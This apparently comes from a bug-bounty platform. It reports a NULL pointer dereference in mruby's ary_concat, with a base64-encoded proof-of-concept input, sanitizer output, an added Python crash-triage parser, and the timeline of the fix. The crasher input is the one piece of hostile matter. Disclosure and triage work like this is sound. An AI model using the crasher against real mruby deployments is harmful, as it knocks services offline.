NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Feb 14th 2022


Description

There is a NULL Pointer Dereference in ary_concat (array.c:301). This bug was found on the latest mruby commit at the time of reporting (hash ecb28f4bf463483cf914c799d086b0cfff997aee) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

The crash is not reproducible in a debug build, so a release build config must be used to reproduce it:

1- Clone the repo and build with ASAN (but in non-debug mode) using MRUBY_CONFIG=build_config/poc_config.rb rake, with poc_config.rb being:

MRuby::Build.new do |conf|
  conf.toolchain :clang
  # include the GEM box
  conf.gembox 'full-core'

  conf.enable_sanitizer "address,undefined"
  conf.enable_bintest
  conf.enable_test
end

2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

$ echo -ne 'R0M6OmNsYXNzLm5ld3tzdXBlciBzdXBlciBzdXBlcigmKQpiPTAsKuk9MH0=' | base64 -d > poc
$ ~/mruby/build/host/bin/mruby poc
/home/faraday/mruby/src/array.c:301:7: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/array.c:301:7 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==54835==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000012 (pc 0x00000055a515 bp 0x7ffe088eb5d0 sp 0x7ffe088ea940 T0)
==54835==The signal is caused by a READ memory access.
==54835==Hint: address points to the zero page.
    #0 0x55a515 in ary_concat /home/faraday/mruby/src/array.c:301:7
    #1 0x55a515 in mrb_ary_concat /home/faraday/mruby/src/array.c:324:3
    #2 0x5ae1c9 in mrb_vm_exec /home/faraday/mruby/src/vm.c:2622:9
    #3 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #4 0x53f5b4 in mrb_mod_initialize /home/faraday/mruby/src/class.c:1648:5
    #5 0x5bc37b in mrb_vm_exec /home/faraday/mruby/src/vm.c:1633:18
    #6 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #7 0x692370 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #8 0x69341f in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #9 0x4c69ee in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #10 0x7f6682c1d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x41c83d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c83d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/array.c:301:7 in ary_concat
==54835==ABORTING
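A crash-triage helper, added here as an example and not part of the report or of mruby, that parses the combined UBSan/ASan output above into the fields a maintainer needs (crashing function, source location, faulting address, the struct type being accessed) and flags a zero-page fault as a NULL-pointer dereference. SAMPLE_REPORT is a constructed excerpt of the output quoted above, and NULL_PAGE_LIMIT is an assumed threshold.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed excerpt of the sanitizer output quoted in this report.
SAMPLE_REPORT = """\
/home/faraday/mruby/src/array.c:301:7: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
==54835==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000012 (pc 0x00000055a515 bp 0x7ffe088eb5d0 sp 0x7ffe088ea940 T0)
==54835==The signal is caused by a READ memory access.
==54835==Hint: address points to the zero page.
    #0 0x55a515 in ary_concat /home/faraday/mruby/src/array.c:301:7
    #1 0x55a515 in mrb_ary_concat /home/faraday/mruby/src/array.c:324:3
    #2 0x5ae1c9 in mrb_vm_exec /home/faraday/mruby/src/vm.c:2622:9
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/array.c:301:7 in ary_concat
"""

# Assumed threshold: a fault inside the first page is read as NULL plus a struct member offset.
NULL_PAGE_LIMIT = 0x1000

@dataclass
class Triage:
    kind: str                   # report class, e.g. "SEGV"
    access: Optional[str]       # "READ" or "WRITE"
    address: Optional[int]      # faulting address
    deref_type: Optional[str]   # C type UBSan saw being accessed, if any
    top_frame: Optional[str]    # function in stack frame #0
    location: Optional[str]     # file:line:col of frame #0
    null_deref: bool            # True when the fault looks like a NULL dereference

def triage_asan(report: str) -> Triage:
    """Pull the fields a maintainer needs out of a combined UBSan/ASan report."""
    kind, access, address, deref_type, top_frame, location = "UNKNOWN", None, None, None, None, None
    if m := re.search(r"ERROR: AddressSanitizer: (\w+) on unknown address 0x([0-9a-f]+)", report):
        kind, address = m.group(1), int(m.group(2), 16)
    if m := re.search(r"signal is caused by a (READ|WRITE) memory access", report):
        access = m.group(1)
    if m := re.search(r"misaligned address 0x[0-9a-f]+ for type '([^']+)'", report):
        deref_type = m.group(1)
    if m := re.search(r"#0 0x[0-9a-f]+ in (\w+) (\S+)", report):
        top_frame, location = m.group(1), m.group(2)
    # Either the explicit ASan hint or a tiny absolute address marks a NULL-based access.
    null_deref = "points to the zero page" in report or (address is not None and address < NULL_PAGE_LIMIT)
    return Triage(kind, access, address, deref_type, top_frame, location, null_deref)

def crash_signature(t: Triage) -> str:
    """Stable key for deduplicating crashes: class, access kind and frame #0 location."""
    return f"{t.kind}:{t.access}:{t.top_frame}@{t.location}"
```

Feeding each sanitizer log from a fuzzing or regression run through crash_signature groups duplicates of this ary_concat crash together and separates them from unrelated faults.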

Impact

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 3 months ago
We have contacted a member of the mruby team and are waiting to hear back 3 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
octaviogalland has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 44f591 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty